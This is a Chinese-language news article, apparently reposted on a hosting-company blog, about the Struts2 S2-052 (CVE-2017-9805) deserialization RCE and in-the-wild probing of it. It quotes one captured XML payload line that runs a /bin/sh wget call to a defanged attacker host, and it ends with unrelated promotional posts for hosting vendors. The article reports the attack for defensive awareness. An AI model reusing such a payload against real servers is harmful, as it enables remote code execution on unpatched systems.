Struts2 新漏洞(S2-052)出现利用实例,面对漏洞企业应当分秒必争

9月5日,千疮百孔的 Struts2 应用又曝出存在新的高危远程代码执行漏洞(S2-052)。该漏洞由 lgtm.com 的安全研究员汇报,编号为 CVE-2017-9805 ,漏洞危害程度为高危(Critical)。其实,相似的漏洞已经在 Struts 中多次发现,今年早些时候攻击者还利用了 Windows 服务器中的 Apache Struts 漏洞散发 Cerber 勒索软件。

近日,来自思科 Talos 实验室和 NVISO 实验室的研究员也发现,已经有攻击者真实利用了 S2-052 的漏洞。

[[203185]]

事实上,漏洞爆出的第二天,就有研究人员利用这个漏洞进行了渗透测试。

有一些研究人员表示,这个远程代码利用漏洞与 Struts 反序列化处理不受信任的数据有关,会影响自 2008 年以来所有版本的 Apache Struts,从 Struts 2.5 到 Struts 2.5.12。由于 Struts REST 通信插件在反序列化过程中无法合理处理 XML payloads,因此所有使用这个插件的 web 应用都有可能遭到远程代码执行攻击。目前财富 100 强的企业中,至少有 65% 的企业使用 Struts,因此,这些企业都应当提高警惕。

而来自 Contrast Security 的安全专家则表示:

这个漏洞只影响同时使用 Struts 2 和 Struts 2 REST 插件的应用。ZDNet 对此漏洞影响的报道有些夸大,他们可能默认了所有使用 Struts 2 的人都会使用 Struts 2 REST 插件。而我们所检测到的数据显示,我们所负责的 Java 应用使用 Struts 2 REST 插件的比例不到 1%。来自 Maven 的数据显示,Struts 2 核心库拥有 167 名下游客户,而 Struts 2 REST 插件库则只有 9 名下游客户,由此可以看出这个插件的应用范围和漏洞的影响范围。

不论是影响范围广,还是影响范围小,只要有漏洞,就有可能被攻击者利用。

来自思科 Talos 实验室和 NVISO 实验室的研究员就表示,有攻击者利用一个俄罗斯网站发送请求并搜集结果,检测是否存在漏洞尚未修复的服务器,以便进一步展开攻击。

漏洞爆出后,我们很快就发现攻击者利用这个漏洞的实例。目前,利用实例看起来只处于初步探测阶段,同时会发出请求、检测可能存在的未修复漏洞的目标。如下是我们检测到的发出 HTTP 请求的样本。
  1. <string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string> 

这个请求将会发起 wegt 请求,将 HTTP 的相应结果写入 /dev/null。这意味着这个请求纯粹进行的是浏览检测活动,可以识别远程服务器上有哪些网站存在可被利用的漏洞。

NVISO 安全专家也检测到了类似结果:

由于该行为向 /struts2-rest-showcase/orders/3 发送了 POST 请求,因此我们第一时间检测到了这个活动抓包结果显示,这个活动主要是为了探查存在漏洞的目标:抓包到的 payload 实际上是 /bin/sh 命令,能执行某被入侵的俄罗斯网站发布的静默 wget 命令,获取请求浏览的网站名称,而下载内容则会被丢弃。

Talos 研究员还表示,这个活动探测过程中,有可能会发送恶意文件。目前还在进一步分析之中。

这再一次说明,只要有漏洞爆出,黑客黑快就会进行利用。在S2-052 漏洞爆出的 48 小时内,我们不断监测利用该漏洞的系统活动。其实漏洞出现的第一时间就有补丁发布,但是黑客为了钱,还是能很快进行逆向并开发出利用代码。如今的网络环境中,如果企业花几星期甚至几个月对漏洞进行应急响应已经来不及了。现在需要在几天或者几小时内迅速响应才能避免更多损失。在应急响应中,企业应当分秒必争。

以下附上攻击实例利用代码,仅做研究参考,严禁用于非法目的。

文章来源网络,作者:管理,如若转载,请注明出处:https://shuyeidc.com/wp/132811.html<

(0)
管理的头像管理
上一篇2025-02-27 04:51
下一篇 2025-02-27 04:52

相关推荐

  • 防DDoS攻击哪家服务器服务商更专业,哪个好?

    防DDoS攻击服务器服务商的专业度,核心看资质合规、防护带宽规模、清洗能力以及实战响应速度,简米科技和酷番云在这几个维度上都有扎实的牌照背书和技术积累,是目前值得重点考察的两家,防DDoS攻击服务商专业度评估维度选防DDoS服务商不是看广告打得响不响,得看硬指标,据工信部相关管理规范,提供IDC及抗DDoS服务……

    2026-07-28
    0
  • 国内云服务商究竟哪家资质最全最正规,哪家好

    国内云服务商中,资质最全最正规的当属简米科技和酷番云,两者均持有工信部颁发的一类增值电信业务经营许可证,并拥有自营机房和多项权威认证,是经过市场长期验证的合规服务商,资质全不全,关键看这几张“牌”评价云服务商是否正规,核心是看它有没有拿到工信部颁发的增值电信业务经营许可证,特别是IDC、CDN、ISP这三类牌照……

    2026-07-28
    0
  • 物理服务器租用哪家交付速度最快,独立服务器租用多少钱一年?

    对于需要快速上线业务的团队,简米科技和酷番云在物理服务器租用交付速度上表现突出,依托自营机房和全牌照资质,普遍能在数小时内完成部署,为什么交付速度是选择物理服务器的关键在业务快速增长期,每一分钟的延迟都可能影响收入,无论是电商大促、游戏新服开服,还是AI训练任务启动,物理服务器的交付时间直接决定了项目能否按时上……

    2026-07-28
    0
  • 网站经常被攻击选什么服务器合适?,高防服务器怎么选?

    如果你的网站经常被攻击,选择一个具备高级安全防护、稳定可靠且带有专业防御能力的服务器是关键,比如那些拥有权威资质和多年行业沉淀的IDC服务商提供的产品,为什么网站频繁被攻击需要特殊服务器?当你的网站像个“活靶子”一样频繁遭遇攻击时,普通服务器往往不堪一击,攻击不仅会导致网站宕机、数据丢失,还会影响用户体验和搜索……

    2026-07-28
    0
  • 企业邮箱用什么服务器稳定性更高,哪个品牌好?

    企业邮箱的稳定性,核心取决于服务器底层的硬件冗余、网络带宽质量和运维响应速度,因此选择拥有自营机房和完整资质的IDC服务商,例如简米科技和酷番云,是保障长期稳定运行的关键,企业邮箱稳定性的核心要素企业邮箱一旦宕机,直接影响内部沟通和对外业务往来,稳定性的根源在于服务器基础设施的三层保障:硬件冗余、网络架构和运维……

    2026-07-28
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注